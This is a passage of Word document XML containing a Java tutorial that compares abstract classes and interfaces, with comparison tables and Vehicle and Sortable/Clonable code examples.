    <w:p w14:paraId="76240977" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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n interface is a reference type, similar to a class, but it can only contain abstract methods (until Java 8, when default and static methods were introduced).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8C1363" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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n interface cannot contain state (instance variables) except for constants (static final variables).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD0B23B" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E758B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D2BDEE4">
          <v:rect id="_x0000_i1196" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30523F2D" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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Key Characterist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6"/>
        <w:gridCol w:w="3976"/>
        <w:gridCol w:w="4772"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="1C6E817A" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E4E6E99" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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01F5C7D7" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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bstract Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D0037EE" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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terface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="489ECB83" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5669F1E5"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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3971D075"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have both abstract and concrete (implemented) methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E56F26B"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only have abstract methods (prior to Java 8). From Java 8 onwards, it can have default and static methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="66093361" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EF235DD"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ariables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D090785"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have instance variables.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E7267E9"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only have constants (static final variables).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="461AB61F" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A04F2FF"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 Modifiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AEAE38B"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have any access modifier (public, private, protected, default).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20285391"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ethods are implicitly public. Variables are public static final.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="52DCEEE5" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09C991F1"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structor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14F07364"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have constructors to initialize the state of an object.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67877694"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not have constructors.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="65D57C75" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00C5ACF3"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ultiple Inheritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A888D04"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class can extend only one abstract class due to single inheritance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2396A8C6"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class can implement multiple interfaces, allowing multiple inheritance of behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="47B4F94B" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A148E1D"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ase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="119CC0CF"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when classes share common implementation but also have some specific behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="459D899C"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when different classes need to share common behavior but don't share a common implementation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="51A0CA05" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04CC8100"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heritance Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="347D8CCE"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herited by subclasses using extends.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F8F9054"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herited by classes using implements.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2073040D" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E758B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712A640">
          <v:rect id="_x0000_i1197" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="776F1F37" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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71"/>
        <w:gridCol w:w="3305"/>
        <w:gridCol w:w="4228"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="27D4DED2" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D0D7F88" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09E27CAB" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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bstract Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50D57420" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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terface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="358B6E04" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C74E70C"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tantiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BD07926"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not be instantiated directly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27C46CB7"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not be instantiated directly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="17A4B4B9" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41085882"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ault Method Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="783850E2"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have method implementations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2383F041"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have default and static method implementations (Java 8+).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="49887E4D" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24B5DF25"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bstract Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="703E6249"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have both abstract and concrete methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="244D6E2D"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have only abstract methods (before Java 8).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="7AD359A8" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14623488"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ultiple Inheritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1685EFBE"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class can only extend one abstract class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B4B178E"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class can implement multiple interfaces.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="53333767" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19236F48"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of extends/implements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F70CA56"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class can extend only one abstract class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="250F3364"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class can implement multiple interfaces.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E758B7" w:rsidRPr="00CE4B95" w14:paraId="6DFA89B3" w14:textId="77777777" w:rsidTr="002576DC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EE14D78"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e (Instance Variables)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5465F9BE"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have instance variables.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="672ABF52"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not have instance variables (only constants).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F817ADC" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E758B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1809B6D">
          <v:rect id="_x0000_i1198" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="655313E0" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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When to Use Abstract Class vs Interface?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2E5CEE" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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Use Abstract Class When:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AFE728" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Common functionality</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you have a common base class that provides common functionality for all subclasses, but you also want to allow subclasses to override some of the behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2743DB6D" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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hared state</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you want to provide shared state (instance variables) for subclasses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71459BAB" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ault implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you need to provide default method implementation (which is common to all subclasses), you can use an abstract class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1671DC5F" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291FD5B2"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agine you are creating a framework for vehicles. All vehicles have common properties like speed, fuelLevel, and location. You can have an abstract class Vehicle that provides common methods like startEngine(), stopEngine(), and some abstract methods that must be implemented by subclasses like accelerate(), brake().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4555D572"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bstract class Vehicle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EA50B5"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speed;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2026DE83"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fuelLevel;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E330842" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D07616"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abstract void accelerate();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164F06FB" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70CB8E9E"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startEngine() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2B2F85"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Engine started");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCADF5A"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4E757F7"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A265129" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B044EBC"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Car extends Vehicle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4D6F04"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08A8DBE0"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accelerate() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5107D7BF"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ar accelerating");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EC9D25"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4555759"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904F968" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE0B8DD"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Bike extends Vehicle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E20C4F6"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3A30E091"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accelerate() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0023F44B"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Bike accelerating");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5F9E02"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53DBED8"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CCF3FF5" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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Use Interface When:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D56B86" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ultiple inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you want to provide a common set of methods but allow different types of classes to implement those methods, without enforcing a common base class. Multiple interfaces can be implemented by a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778AE57E" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you want to decouple behavior from implementation and allow multiple unrelated classes to share the same behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26930F9B" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B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Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CA7875"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agine you are creating a system where different objects can be "Sortable" and "Clonable". By using interfaces, you can ensure that multiple unrelated classes can have these behaviors, even if they don't share a common parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7C27D3"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Sortable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2210A54B"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sort();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A1E757"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534DE2E" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="783C6200"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Clonable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F888B4B"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bject clone();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7454884C"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9FDB375" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44DA866A"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Person implements Sortable, Clonable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E637477"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1877B88C" w14:textId="77777777" w:rsidR="002576DC" w:rsidRPr="00CE4B95" w:rsidRDefault="002576DC" w:rsidP="00E758B7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43EF98FE"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59CD22B6"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sort() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB9832D"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System.out.println("Sorting person objects");</w:t>
      </w:r>
